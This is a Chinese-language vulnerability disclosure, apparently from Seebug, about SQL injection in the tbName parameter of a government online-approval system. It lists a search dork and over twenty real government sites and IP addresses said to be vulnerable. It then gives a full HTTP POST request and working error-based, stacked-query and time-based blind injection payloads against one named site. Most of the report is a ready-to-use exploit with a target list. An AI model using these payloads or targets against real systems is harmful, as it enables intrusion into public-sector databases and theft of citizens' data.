### 简要描述: 某政务审批系统通用SQL注入漏洞,影响众多政府单位 ### 详细说明: 系统开发厂商:邯郸市连邦软件发展有限公司 系统架构:ASPX+MSSQL 漏洞文件:workplate/base/person/listbyorgsel.aspx 姓名搜索处,tbName参数过滤存在问题,导致注入 关键字:inurl:workplate 日照市网上审批系统 http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx 保定市网上审批系统 http://www.bdxzfw.cn/workplate/base/person/listbyorgsel.aspx 磁县网上审批系统 http://www.cxxzfwzx.com/workplate/base/person/listbyorgsel.aspx 魏县网上审批系统 http://wxxz.gov.cn/workplate/base/person/listbyorgsel.aspx 邯郸县网上审批系统 http://www.hdxzwzx.com/workplate/base/person/listbyorgsel.aspx 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx 城区网上审批系统 http://211.142.37.152:81/workplate/base/person/listbyorgsel.aspx 左云县网上审批系统 http://211.142.37.152:88/workplate/base/person/listbyorgsel.aspx 天镇县网上审批系统 http://211.142.37.154:83/workplate/base/person/listbyorgsel.aspx 广灵县网上审批系统 http://211.142.37.152:83/workplate/base/person/listbyorgsel.aspx 新荣区网上审批系统 http://183.203.128.238:82/workplate/base/person/listbyorgsel.aspx 矿区网上审批系统...
### 简要描述: 某政务审批系统通用SQL注入漏洞,影响众多政府单位 ### 详细说明: 系统开发厂商:邯郸市连邦软件发展有限公司 系统架构:ASPX+MSSQL 漏洞文件:workplate/base/person/listbyorgsel.aspx 姓名搜索处,tbName参数过滤存在问题,导致注入 关键字:inurl:workplate 日照市网上审批系统 http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx 保定市网上审批系统 http://www.bdxzfw.cn/workplate/base/person/listbyorgsel.aspx 磁县网上审批系统 http://www.cxxzfwzx.com/workplate/base/person/listbyorgsel.aspx 魏县网上审批系统 http://wxxz.gov.cn/workplate/base/person/listbyorgsel.aspx 邯郸县网上审批系统 http://www.hdxzwzx.com/workplate/base/person/listbyorgsel.aspx 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx 城区网上审批系统 http://211.142.37.152:81/workplate/base/person/listbyorgsel.aspx 左云县网上审批系统 http://211.142.37.152:88/workplate/base/person/listbyorgsel.aspx 天镇县网上审批系统 http://211.142.37.154:83/workplate/base/person/listbyorgsel.aspx 广灵县网上审批系统 http://211.142.37.152:83/workplate/base/person/listbyorgsel.aspx 新荣区网上审批系统 http://183.203.128.238:82/workplate/base/person/listbyorgsel.aspx 矿区网上审批系统 http://211.142.41.114:82/workplate/base/person/listbyorgsel.aspx 涉县网上审批系统 http://www.hbsxxzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx 临漳县网上审批系统 http://www.lzxzfwzx.com/workplate/base/person/listbyorgsel.aspx 安新县网上审批系统 http://www.axxzfwzx.com/workplate/base/person/listbyorgsel.aspx 高阳县网上审批系统 http://gyxzfw.net/workplate/base/person/listbyorgsel.aspx 长子县网上审批系统 http://60.220.253.153:81/workplate/base/person/listbyorgsel.aspx 屯留县网上审批系统 http://60.220.240.7/workplate/base/person/listbyorgsel.aspx 浑源县网上审批系统 http://211.142.37.152:85/workplate/base/person/listbyorgsel.aspx 邱县网上审批系统 www.qxxzfwzx.com/workplate/base/person/listbyorgsel.aspx 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx 大同县网上审批系统 http://211.142.37.152:82/workplate/base/person/listbyorgsel.aspx 等等 漏洞验证: 以http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx为例: 测试数据包 ``` POST /workplate/base/person/sel.aspx HTTP/1.1 Host: www.rzfwzx.gov.cn Proxy-Connection: keep-alive Content-Length: 7520 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://www.rzfwzx.gov.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://www.rzfwzx.gov.cn/workplate/base/person/sel.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: ASP.NET_SessionId=20pcvnaemrwp3m55abofomyk __EVENTTARGET=btnSearch&__EVENTARGUMENT=&__VIEWSTATE=e58pNCa91W2cmUv%2BC2Q6Qn%2BSGw%2F6y7UAGEWTZNhowo2HBkCa1sL3NaULhGvl3NijmwrsdtoHFFhhMfWQedJ3v3RDPSZpX5qwKjjz1RnLEh4SObU1WQiWkqcc85DYPRWTnFNh2VzrIMr51mCLJOofb82NHZuEJSo0HxtLknCJ5OfURXRSPZfElBNDICQx6o4dCFxzAyhNPuHZNnWHdVvD2zxR58ZFNvrBKATEGQ7dW%2BzwLWbq38Luzfkt3A3KOZAp%2BUbQ30pQKyWsU9jO5M5WdAuKE684nNYKxEohB0Bkq8Ks5lNVTptpBlMWId8Zgn20Z42bldweQOEu69N2Kfreyvy6UkEcyRl4HSa7wKWPlGiQHaM5dAcFRGfcSBNt4A59U%2FhCN859oaFaa3otqa2DPogQTAynB1rWemisF7SCENbMj1aV%2FGtsbPp4TZDOezQstlokfpTzrbpJWCwbtwtMh8wTtT%2BUZfgO%2B4eyT0ZTPxxd4M%2Bgml3DDde08g7Lr9i0s4xwxpfNKcYOyf%2FiwUijw9Y%2F7kxebqATavTJW2u6KARXqyeS2%2F5lLOKv4DIZgShdlH8Y9%2BR6ODA2mqs3L2a7w%2FmC6tyyyoFJ9WXu6zMcM7KVe4%2BQUDN%2F7r4Fgrs697QklvBH7Up0XCYirUl6rhkUy97opayO4BZSszDQW0kZS%2FcQVobu6LvrLhk0K4C5nmu9a8DswE1tHT2gP4CWiGPF4xQmxBQva9AsoJiyIYc6LRmSXwhG8lVE4%2FglbVy5L1YTY8g1TbvUkcdsHJTyph2cnmn1qAls4lt6OjtSUvm6TUA5SnCYxHTgIQfm6yBkvl2tnsCaOar%2BNVARUIslnh3V8hR5exlNRJN3J855qgbaKvY3dUtj4xRwpw9Bb1jQ6jfT%2FXaMkxpRfX4tJlaYQKAbw9CCnI7bkM9gHbFm5YhIfL7X%2Bprnh9bBfZH09bqN5zS3WL6ELJA0z4b3%2Fs1h4oSeqMtqyzuRQuqmKvVbSl60zBfftB6zWm%2FYJVt5%2BbJjp3S14JOO8LvvfHNY6IVB4Lqiqdrrx2QgQkOmPE8MArMzaBo7rQOMmCQI7BEaCx%2FBJgtKS6Bvi%2B90PZXItv%2BxS60ALauimNSU4z3uE3QMWG0HlMRpBwZunA379VYLyfs5CFy4Qbgg2F%2FZyzgIrOWkxfP5GrYMnapbLcjLjHU08uyHpLldqp5JlCRxufhQOo9Amk19qCKAsHG%2BM0Z8%2B2btFbkLTP7Z%2FZzDUq%2FBTbQ2uT7Tv11o0jV0EvrAQLDCO93qsvtNuMmLYETVdpQJywpPoj8b5LEJ4rbm9t%2FMNYkRKy%2B8KhX%2Fvb97w0CgW%2FDhTjD8Xgzy3akN9ydUD%2FMRYulxvOmby9Ytw%2FPGmlZo5t9hmk1F8M86YiNi3fnw0incxLeJprZyVMuu%2FJRWCvkd9TVUcE0l1Yc3MZfGPP1lnm3Ktx7df%2F4IPtYHQG2z8B%2BskDCFpZn2Q0GsmfNY0X3CWoUP0QNrDe%2BvVSesrl3EbjXueMTKO9lJLnuNVYyDGWeR8o33TnKxdhH3KjybV%2Fr5uJrh6KPG9D9A74V4oh5j9kZSqqe0erOLZ%2FdUs%2BIQKZSLj0zUvbY25LatfaVLckTihVMoPUnHc9ca61JwGASAUll1Q6d09sNDEqnL5g%2FegiluS4cP68dreEJoDk3kflNZqvNgTHz6j3wt%2BwUuIWEi6oGpc%2F24nFIf%2BXQu2f1nKQp%2BBH86ZLu4LVAZRqK4e0fkNvXGGXiEKsfUknIEcR53i6xygKJ09Nx6kUtyx4rYIkulOTKKiMTxClzYiIRYxxXu%2FAnlU9gM1fHbfazV%2B516BtwhhtupLK%2F4SwHbKoGvoUlPzDxWGYTqaIi5VKLA%2FYAwn3HVYIijYvb1jXiZpz2O%2BzHamX3E%2FNs%2FoJN2qlGBY3Ip%2BxhE6goTGGllSKC2dN4CuqhLkjBBreTiE%2F6XNHHwYPY5CPLoXdboTAzkxz95MCklt%2Fg5KUZCBdwoyk7KyOzIw5%2F6U4%2FFRSfWxjXXsvQkq16eJzI3UXzqY6Mh8fl%2FMMPEuE2dlVyWnl3wJTKs14U9pmyYxSEWS%2F5wv5vIpXBjkjaoSU6F8j1BL%2BJUgJkvf%2FoRdRMY%2Fm7hdtfFpSesRzos3UpRUoFtVHC7k61z%2FHbrtjBW9a76IFmJE%2BzVAdFeOEZ%2Bc3yV13Z8LeaaMKMeubjrx%2FbF5xqwOi%2B%2Bw5QpvUS4vTmQDO%2B7UskvnJilJhpeMKHwnBQMSQ%2FMm6XYBIo7HmDBLsnmsOomgSbTfbLwgG0Dw%2F3pfTONWQMqiJ72evJeuZF3CgKy5h76LqTbFQCU71nqil8qOatRoNcsJWpcDFEVfmgVTAa7%2FzqIehfq4EY%2B%2B0%2BemmQwxSqDZWmle8sTrEkh1IpP0yOOib5M03LUErHugMjtlNhuxoUzDv0npzLUNYhTC0FMxqDUYQHDgigiYUN%2Fg2GUJfXH4TEIMp01TwwRBoJm%2BrlvZpCsiZf4OLS3IyfmcguJ8c5ChtlJwXND4qpfa9EN%2F1QVmhiERswUQUnAMOy%2FhoLrxUNSSK%2FS5mlAcRcFyskxKfSzkZUzVVPy8YjTCoc4eKj2XwPoXPpB1Do56UD%2FOpbjb8PWagl7GvOW5wTBbRTl%2BdCquVj4xDhmfpJZMseEs55scGCEsDnh1JzIa5Kv6zxB6UuVRnruD%2BDmh6H9KqWZXodJfmPfnmvCUsxrwwt20p5aqtBhSvBcMyzPcGWJAE%2BD21BIXPZDzvJvRLtfk5URZXqD3AMqBKDs4PwpBEkvj5mXEZ%2F5wTnUkgz5%2FDNss3UT87cJ2mAkQRWZFkgZg8a2TFKG4n5a%2BBWD33Yt7DSyG%2FEwT33cn4Gq35Zsd35h4GiRLQg6oc3qB9drIt1E8QbP21qrKcyhklGcAlhUp6jLAMxHgOr3F6hgI4CNAxfd43bgN0%2FtMT%2BmzjcnE92onglsI09UZxQ0JjdobTVKAgU5JipDr0MjnC%2B9Xo7pnglz4VHxEX3HkXp5FYm%2FeJuTnOoTItf3%2BvmicX8kMbaXVVMjdLHgAqOis7QsuOu5v2ctBclX4sRuRBs%2BWPBvuOyvmn9rm1OYaOMI4brbW9eRvdmjmYzNlA5PqL1mymfV1AjUXkFHIGNimvFIVe2m0QF09O%2BLsCnuBt2m1cxbP409pSlxxf6Y6jdFcKk8Dg9HetcgoTfBzaFiQVIW52ZI6bmtjaz3ORnPJBCDPt8U%2B32h4xfVZ4kEh1mUIh0Xnj3ZYl2z0CxINUQ2kyw2isVGPoQL%2Bx6fj%2BTOc5MFi683XFMkb1bcuy%2BzJS1Drp8oJ4oweLcpPPapokXq%2FCE51UnQ1JQ76tpxzjTJB4LmBt4EWy5qPeG4ixQP7czN7K0q%2ByKea3E4wEcdSrPqXOZj2b39MAwC3RgxZgBGrKqoB3%2Fa8jYQsqS75pf7T89mch0wqmSigNnMQ9y%2B2pvF7zGEzT42%2FW%2F6ZYh4rRi2SZveikBNippKTNFeHPz510osAqi333K2oJyKDKjemfkpIEVoVeaYWOOREOb9OYcXwcVKsq8QJMa0eHKeNYLj1NuwAE%2FQuVQHXUI0jF%2BBbnpmICWeWcXBG9%2BislF2bPMMt1dRTMsP0c4Z5QJd2XVmmwsZ8UpodCbwj4DMDPFPqsWdH5QhLC%2FPo7KtTEVfCXQ%2FHidaig4OgTZadwDOuY3midfsNLCWrbgwmKTYmcPZtwBZw32TH2pRDHfdXFbV3oE9tRGEpv9zjCOe48CuXzKOYIx0dUwBrTHQfgHtClwdJL8Oqg8JiLFa1Bn6%2F9oS9BnyRjwQN7jSyQp3Kxk1namBtbj8iDCAjKAf1iFoaBbBEFvFrM%2BJTQWwIRTNkxtjUtTP2icZ5uUzV%2BdbslQGtJ45e%2FTQZOBfIUNdjc9GXmDLUr9N9cUPAZIqZn2jE3oHxdB8v%2Fl%2Bbpm%2FlCZR5q%2FJ1zoWM2qB4SEJX2sUcxwputvdlr0LVPz0XE6ob8%2F3Sr5pL%2Brk8gEUT4cOTWOMuxWtiOZrMcO3EIljMLOvNf9a%2BPJYvtp3oGvGFdFPngQcqsa7LreiWN62yJTf4hGWTA6AZP2ZaKUx2Xr5BHau0kIct2oaVZeclhlY%2FgDkTh9S06q3UH%2FqHvHW0IlbQGh0k9wYRliRAQrLZUac16rHE5lnWrTEJzQcApccNlC%2BJZvE%2FtoTNoFT1kI0Nl9hsuTvCMrtG9AGRFK46wgYLqr2mIOQUr0AEVjC24YpgxpHRpmPwSJsJfO4DW%2FlagOtIbDbeOhRsaADQqJv6GY5RqEcoVCq3VLDm4qgYU8%2BWzLN1dwkeSir6OJq0dZ3%2BuDymsMMxuSsAdL6b2Ay%2Fghp3R3yaQvX26CKw8rulQJF1Bw2Z2jj1CRv4ODVLc1ZyuaUyAGnAgggqbddoRHpN0j60p7yt%2FnJ8Ohfwla9GU0HQp6SrolAuSW4p%2B7M4UPohp9fReIBQOcfj%2B0ON2guQxv%2BhVGTWJBQvgfp6W%2BR92mxrPINgjIzKctXRjjPfIYvZJTS%2Bge9htq9xFw3FytniLF7nGJj4sGCe8U5dk7a3bCUdxTYcIcrygbL7cKa4AQghSbNhOxX%2FmEuNiN72s8Ra55nQl3nmcl08ANY060qQg9hyxzckO%2Bb8HnXBvJqfG68GryzLXwn%2B6S8G%2FAbk16Cg2ej8VitCVbB%2BKVS3kHHM8AIba21481Yz4MMXRGxXK8TFwuFJRBLgR5LjkcH34pWSqqJAMFNuy9lEWALt%2Bvvh6kak%2FTSE%2FdUPKlJe8XsXFWP1Nt769sRK91HyUjH1k4WwY7ZiOF74afebJfIIh4%2FznC%2Fy6OrOAN9EFuUo4WXBsmlQRqcw%2FqsZtLupjRr2WF%2BnaQky8FFX70XkwISO%2Bb8%2FFOFbJ9g92h%2FuCwZx%2FZDuTl4jz15QZoiRHc2xOzh5MaZUoDP3%2B5sDg0LQR%2BjsGe8%2BdBbEco7KtmVCuaVLZNaNl5LgOvMffGpdEsW741PiQuXUPol3%2BEDFYstv4cH1qyOZUDVfJ3OYk3qzahKYizMvperlpeMzOmKkIPX64ckscUAnye%2BUkAEymeTqmqb91unHrSMJRlteKTS7jf9yw1gNi2ZnfuAoloGS11I32tp%2FraSQ2i00Hli2hNDPaYA5UB9fXyxuK%2B7VG7LxOGvcW3iU5lotOQey9CnIdXrodvkZ1CtjUc5AHcklMXIiRInjsxlu%2B8Dz5vCL1Nn0mTq1Os%2BWCU0%2F7zdWlDQ1oOGu2GtG%2FJg4OsFiSJhh%2B20oAA%2Bt%2Fzo86uXNp%2FH19FmSIBCZ91T%2FxEW7sHFXPuy7ZjWlHmx%2B2Vf%2BSHCMk%2FPNNckZtzXtinR%2B1nUDfpep%2BwQyFFys8OyhsMYWI5Bn6YMGHjcaVFSAK30iRpk3X4u9K2NXYDOMGS7B0yKnTHr8P4SQQy%2FHU1je%2FJtOW8BcvqXSovToGJoSrQ6%2BiDDbczLrkJzqSsJ8UyOP1ZeuolotRnZQ%2FCwrBKj7zZMTIsJDwwRe4cAx6DquuEmyRI6UxVqUzO%2FM%2BTZFh6wB9ZwzRhySP4URC9Nbv%2BW%2BKrtXd4oeLHbL1TsqjRln%2FV%2F2lZLx2DRQru7DKPF98vuP1xDwwEr27iC%2F6w0wZU%2BU%2BHE29e4VCa4oO4%2BxPiG%2F9gXKN6TjXJe9RjqzqC56QMkIu%2B%2FN8qN7thYhMaqf0t%2BLYmqO%2BCuzt5XA%2FI3wilh1c1LvUxKgrQEOLPtucU997mXyCH%2F72AeaxuV%2FSFwL3reJCqxHJGYB7XBXHu%2FyemYNQNG9qIhNfBIs4CH8sD21peSwCFvPq8kTzOUuGnR%2Fyyc%2Bq%2By9QthDKxmAq7mX0CfVuiT9wBtkLCPDlx%2BPLf6Hmqo3iZtLQYgo2Z2gnhh8%2Fdd2jMLcs5qtR2o3NgdpptBB0gq30XfcTt614LzPtjX4afvkyQcEv2FrokYcBHPeTtAdR%2FaEolpVIxNmdQ7bGK7cAaASxtBAkI72HvJxQIq0f8tzo4hlORBYpXppD8NUvp5jJAEzak0rQmzhoy6JR5DSkRgAzpuN%2BY5mdqayn%2BGRrNiYWxyqd9j47l%2B2ddMk0%2FCLvZII8RAGzPA16ebt9LuVyfN%2BFfiXfET2MoAM8v%2BukOWnLF4tWwniximhduFtnuaOXmOR%2FGEMW0Qrc1dK072ffnhHb2O17qHKP%2FhUUyGPjdtHAZcfDS0X5Ydug32a4RBQZrQU1lK7HLBSK2Oo14MvUaLblh0fNKFwezsvFqLKWw7LB6Opj8mVS5EblCrRopi0zlq2bg%2FLFnGUXTFYkIkbIAf2BUpayHaB4DgzzDkS8M2dgzQ5pUV042U9gauOwrJsTAhaSSXPGeX9Zyj73nQyeihBjLzBRyCuNrhXysOyQ3IWwlVob7fKoAb2viXmkiEc6%2FAMGxelbZptSLjDwyW1xXER3Tq0AEZWjm8DKmZMjsBzUhK39pYznNhN1NoWvqlGQJ1O7p%2BVfGjmIhc1W%2F%2FP0kqtpXNpgNCc8uyi2o%2BnuHIZIAbY4DjNLFf%2FbyA6N7u2UcHyVTWG36cSa9uAqb4RvQ1GQlDqcvUdwDsAly4lpcCerGd8D3vQ6QD5YBnukTbw2pi%2BY3xisWYcxD%2FzioOh%2FLXkB6w9%2FZzu%2B5I8in1mCmqPBFn9HQ0%2BFgg67DopYV4wyuKCmn4wAu9I5pX7rwtloeiD5BamDe9isbh%2B05EOSjkn3UmTueJ4eFJjx%2FwHn%2FAH0KINo3%2Bdk1qapekEUCrxANLk9hXwa8do9XRSwV9ppzIhisk&__VIEWSTATEGENERATOR=58B991A9&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=nqko7X3j4J3kRX2BT4DLjZ0lYbV3KRv9Lo3XjbMuKOB54MSAkM%2FacTTBWlUjpb6w%2B%2FBkvK2mQ4hkrQ%2BhUngdkfgnW%2B%2Ff8LIp1szVS0ULyOiY%2BZcRis1qqDT0FEpPbXW5zIhKpAMl9fALGQTCScozAy%2FHiOA%3D&iptIds=&tbName=aaa&gvList%24ctl18%24txtNewPageIndex=1 ``` 漏洞验证: ``` Place: POST Parameter: tbName Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=btnSearch&__EVENTARGUMENT=&__VIEWSTATE=YGTSXgHBDdXYVE vZvqepad N25T YE0ORE8mwmKVWb2RnrMQts/78uWI7k9k3y20Dgp7PBJS2kxubLOYofV9IRiWz1cbNA rPzU1dKeNgDDS3cFxw/c0NvHdPomnvZR/Ro4cBiXHShiDry8VyzAbAo aJVvq1PBXpYDss9bO8K h07 qzBU53AHlxxkCFrqXntA9aCHfgACo8CIOGVhJ9jrj5AsGUsH/48327iq8Wo7jL6YL2dcyH7VNsQnf6cQ 83LnA6FYAqn1W34xm9OlTxUaLVwFEpZLqEkwsXHVP m0n9eH9iX4haCOIsbxgAuoPJ06ASV0SwXwH4b8 4Hn9CUkN83GHJyE6rtmaNY4KJTtpTOwGe8&__VIEWSTATEGENERATOR=58B991A9&__VIEWSTATEENCR YPTED=&__EVENTVALIDATION=bmE7u/9OBSpb7hJh8vnRrnJ0mKiE2fszK2RpnF0B7SEghI5D/K9Xa7e mcWIB2CDL/GqPtyNgKYqQdCrSK2jCQWQ88y2vJcR7Gx7FqiuoFqx8Xnvv&iptIds=&tbName=aaa%' A ND 7980=CONVERT(INT,(CHAR(58) CHAR(116) CHAR(101) CHAR(103) CHAR(58) (SELECT (CA SE WHEN (7980=7980) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(11 5) CHAR(113) CHAR(58))) AND '%'='&chkRow=1813$$%E9%9F%A9%E6%B2%BB%E5%9D%A4$$0$$1 64$$%E6%97%A5%E7%85%A7.%E6%B0%B4%E5%88%A9%E5%B1%80$$$$$$$$1900-1-1 0:00:00$$$$$$ Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=btnSearch&__EVENTARGUMENT=&__VIEWSTATE=YGTSXgHBDdXYVE vZvqepad N25T YE0ORE8mwmKVWb2RnrMQts/78uWI7k9k3y20Dgp7PBJS2kxubLOYofV9IRiWz1cbNA rPzU1dKeNgDDS3cFxw/c0NvHdPomnvZR/Ro4cBiXHShiDry8VyzAbAo aJVvq1PBXpYDss9bO8K h07 qzBU53AHlxxkCFrqXntA9aCHfgACo8CIOGVhJ9jrj5AsGUsH/48327iq8Wo7jL6YL2dcyH7VNsQnf6cQ 83LnA6FYAqn1W34xm9OlTxUaLVwFEpZLqEkwsXHVP m0n9eH9iX4haCOIsbxgAuoPJ06ASV0SwXwH4b8 4Hn9CUkN83GHJyE6rtmaNY4KJTtpTOwGe8&__VIEWSTATEGENERATOR=58B991A9&__VIEWSTATEENCR YPTED=&__EVENTVALIDATION=bmE7u/9OBSpb7hJh8vnRrnJ0mKiE2fszK2RpnF0B7SEghI5D/K9Xa7e mcWIB2CDL/GqPtyNgKYqQdCrSK2jCQWQ88y2vJcR7Gx7FqiuoFqx8Xnvv&iptIds=&tbName=aaa%'; WAITFOR DELAY '0:0:5'--&chkRow=1813$$%E9%9F%A9%E6%B2%BB%E5%9D%A4$$0$$164$$%E6%97 %A5%E7%85%A7.%E6%B0%B4%E5%88%A9%E5%B1%80$$$$$$$$1900-1-1 0:00:00$$$$$$ Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=btnSearch&__EVENTARGUMENT=&__VIEWSTATE=YGTSXgHBDdXYVE vZvqepad N25T YE0ORE8mwmKVWb2RnrMQts/78uWI7k9k3y20Dgp7PBJS2kxubLOYofV9IRiWz1cbNA rPzU1dKeNgDDS3cFxw/c0NvHdPomnvZR/Ro4cBiXHShiDry8VyzAbAo aJVvq1PBXpYDss9bO8K h07 qzBU53AHlxxkCFrqXntA9aCHfgACo8CIOGVhJ9jrj5AsGUsH/48327iq8Wo7jL6YL2dcyH7VNsQnf6cQ 83LnA6FYAqn1W34xm9OlTxUaLVwFEpZLqEkwsXHVP m0n9eH9iX4haCOIsbxgAuoPJ06ASV0SwXwH4b8 4Hn9CUkN83GHJyE6rtmaNY4KJTtpTOwGe8&__VIEWSTATEGENERATOR=58B991A9&__VIEWSTATEENCR YPTED=&__EVENTVALIDATION=bmE7u/9OBSpb7hJh8vnRrnJ0mKiE2fszK2RpnF0B7SEghI5D/K9Xa7e mcWIB2CDL/GqPtyNgKYqQdCrSK2jCQWQ88y2vJcR7Gx7FqiuoFqx8Xnvv&iptIds=&tbName=aaa%' W AITFOR DELAY '0:0:5'--&chkRow=1813$$%E9%9F%A9%E6%B2%BB%E5%9D%A4$$0$$164$$%E6%97% A5%E7%85%A7.%E6%B0%B4%E5%88%A9%E5%B1%80$$$$$$$$1900-1-1 0:00:00$$$$$$ --- ``` [<img src="https://images.seebug.org/upload/201503/291059310f5f807ccd5ed0d8df0d29a6a7ab07f8.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/291059310f5f807ccd5ed0d8df0d29a6a7ab07f8.png) [<img src="https://images.seebug.org/upload/201503/291101495fe3a72768c42b83c83b9f3a4c3316c4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/291101495fe3a72768c42b83c83b9f3a4c3316c4.png) [<img src="https://images.seebug.org/upload/201503/291102027a8431766884dd852b1e06a6a287e0fe.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/291102027a8431766884dd852b1e06a6a287e0fe.png) ### 漏洞证明: 如上!
